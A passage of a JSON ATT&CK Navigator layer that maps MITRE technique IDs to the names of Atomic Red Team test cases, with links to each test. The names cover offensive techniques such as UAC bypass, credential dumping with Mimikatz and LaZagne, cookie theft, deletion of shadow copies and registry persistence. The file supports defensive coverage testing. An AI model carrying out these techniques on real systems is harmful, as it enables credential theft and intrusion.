policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic 
Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- 
ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive 
invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - 
Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software 
Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage 
Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet 
New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies 
(Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process 
cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- 
Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login 